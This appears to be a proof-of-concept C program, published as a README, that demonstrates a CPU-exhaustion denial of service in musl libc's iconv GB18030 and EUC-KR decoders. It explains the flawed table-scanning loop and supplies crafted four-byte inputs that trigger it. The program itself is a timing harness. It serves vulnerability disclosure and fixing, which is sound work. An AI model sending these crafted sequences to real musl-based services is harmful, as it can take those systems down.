README.md
Rendering markdown...
/*
* poc_gb18030_dos.c - PoC: Algorithmic complexity DoS in musl iconv
* GB18030 and EUC-KR 4-byte / extended Hangul decoders
*
* The GB18030 4-byte decoder (iconv.c:434-442) contains a gap-skipping loop
* that, for each decoded character, iterates the entire gb18030[126][190]
* table (23,940 entries) to count how many 2-byte-mapped codepoints fall
* within a sliding range. For inputs whose linear index lands just below
* the dense CJK Unified Ideographs block (U+4E00-U+9FBD, ~20,902 entries),
* the loop runs ~20,000+ iterations, each scanning all 23,940 entries.
*
* Result: ~500 million comparisons PER INPUT CHARACTER.
* A small crafted input (e.g., 400 bytes = 100 characters) causes
* ~50 billion comparisons, taking minutes to hours of CPU time.
*
* The same pattern exists in the EUC-KR extended Hangul decoder
* (iconv.c:514-522) with ksc[93][94] (8,742 entries).
*
* To test on Alpine Linux (musl-based):
* docker run --rm -v $(pwd):/work -w /work alpine:latest \
* sh -c "apk add gcc musl-dev && gcc -O2 -o dos dos.c && ./dos"
*
* Compile: cc -O2 -o poc_gb18030_dos poc_gb18030_dos.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iconv.h>
#include <errno.h>
#include <time.h>
#include <stdint.h>
static double now(void)
{
struct timespec ts;
clock_gettime(CLOCK_MONOTONIC, &ts);
return ts.tv_sec + ts.tv_nsec * 1e-9;
}
/*
* Time how long it takes to iconv() a buffer of `nchars` copies of
* the given 4-byte sequence from GB18030 to UTF-8.
* Returns elapsed wall-clock seconds, or -1 on iconv_open failure.
*/
static double time_gb18030_decode(const uint8_t seq[4], int nchars,
const char *label)
{
iconv_t cd = iconv_open("UTF-8", "GB18030");
if (cd == (iconv_t)-1) {
printf(" iconv_open failed: %s\n", strerror(errno));
return -1.0;
}
size_t inlen = 4 * nchars;
size_t outlen = 8 * nchars; /* UTF-8 worst case: 4 bytes per char, generous */
char *inbuf = malloc(inlen);
char *outbuf = malloc(outlen);
if (!inbuf || !outbuf) {
perror("malloc");
exit(1);
}
/* Fill input with copies of the sequence */
for (int i = 0; i < nchars; i++)
memcpy(inbuf + i * 4, seq, 4);
char *inp = inbuf;
size_t inleft = inlen;
char *outp = outbuf;
size_t outleft = outlen;
printf(" [%s] %d chars (%zu bytes input)... ", label, nchars, inlen);
fflush(stdout);
double t0 = now();
size_t ret = iconv(cd, &inp, &inleft, &outp, &outleft);
double elapsed = now() - t0;
size_t consumed = inlen - inleft;
size_t produced = outlen - outleft;
if (ret == (size_t)-1) {
printf("error after %zu/%zu bytes (%.3fs): %s\n",
consumed, inlen, elapsed, strerror(errno));
} else {
printf("ok, %zu bytes out, %.3fs (%.1f us/char)\n",
produced, elapsed, elapsed / nchars * 1e6);
}
free(inbuf);
free(outbuf);
iconv_close(cd);
return elapsed;
}
int main(void)
{
printf("=============================================================\n");
printf("musl iconv GB18030 algorithmic complexity DoS PoC\n");
printf("=============================================================\n\n");
/*
* BENIGN input: 81 30 81 30
* Linear index = (0*10+0)*1260 + (0*10+0) + 128 = 128
* This is a low codepoint, the gap-skip loop terminates quickly.
*/
uint8_t benign[] = { 0x81, 0x30, 0x81, 0x30 };
/*
* ADVERSARIAL input: 82 35 8F 33
* Linear index = (1*10+5)*1260 + (14*10+3) + 128 = 19171
* This lands just below the dense CJK block (U+4E00 = 19968).
* The gap-skip loop must "chase" through ~20,902 dense entries,
* running ~20,905 iterations each scanning 23,940 table entries.
*/
uint8_t adversarial[] = { 0x82, 0x35, 0x8F, 0x33 };
/*
* Another adversarial input right at the CJK boundary
*/
uint8_t adversarial2[] = { 0x82, 0x35, 0x90, 0x30 };
printf("--- Benign input (fast path) ---\n");
double t_benign_1 = time_gb18030_decode(benign, 1, "benign x1");
double t_benign_10 = time_gb18030_decode(benign, 10, "benign x10");
double t_benign_100 = time_gb18030_decode(benign, 100, "benign x100");
printf("\n--- Adversarial input (triggers dense CJK loop) ---\n");
printf(" WARNING: 1 char may take several seconds!\n");
double t_adv_1 = time_gb18030_decode(adversarial, 1, "adversarial x1");
/* Only continue if the first one wasn't too slow */
double t_adv_5 = -1;
if (t_adv_1 < 30.0 && t_adv_1 > 0) {
t_adv_5 = time_gb18030_decode(adversarial, 5, "adversarial x5");
} else if (t_adv_1 > 0) {
printf(" (skipping larger tests, single char took %.1fs)\n", t_adv_1);
}
printf("\n--- Adversarial input #2 ---\n");
double t_adv2_1 = time_gb18030_decode(adversarial2, 1, "adversarial2 x1");
printf("\n=============================================================\n");
printf("Results:\n");
printf(" Benign (100 chars): %.6f s\n", t_benign_100);
if (t_adv_1 > 0) {
printf(" Adversarial (1 char): %.6f s\n", t_adv_1);
if (t_benign_1 > 0 && t_benign_1 > 1e-9) {
printf(" Slowdown factor: %.0fx per character\n",
t_adv_1 / t_benign_1);
}
if (t_adv_1 > 0.01) {
printf(" Projected 100 chars: %.1f seconds\n", t_adv_1 * 100);
printf(" Projected 1000 chars: %.1f seconds (%.1f minutes)\n",
t_adv_1 * 1000, t_adv_1 * 1000 / 60);
printf(" Projected 10000 chars: %.1f minutes\n",
t_adv_1 * 10000 / 60);
}
}
printf(" Compare: 40KB of benign GB18030 decodes in microseconds.\n");
printf("=============================================================\n");
return 0;
}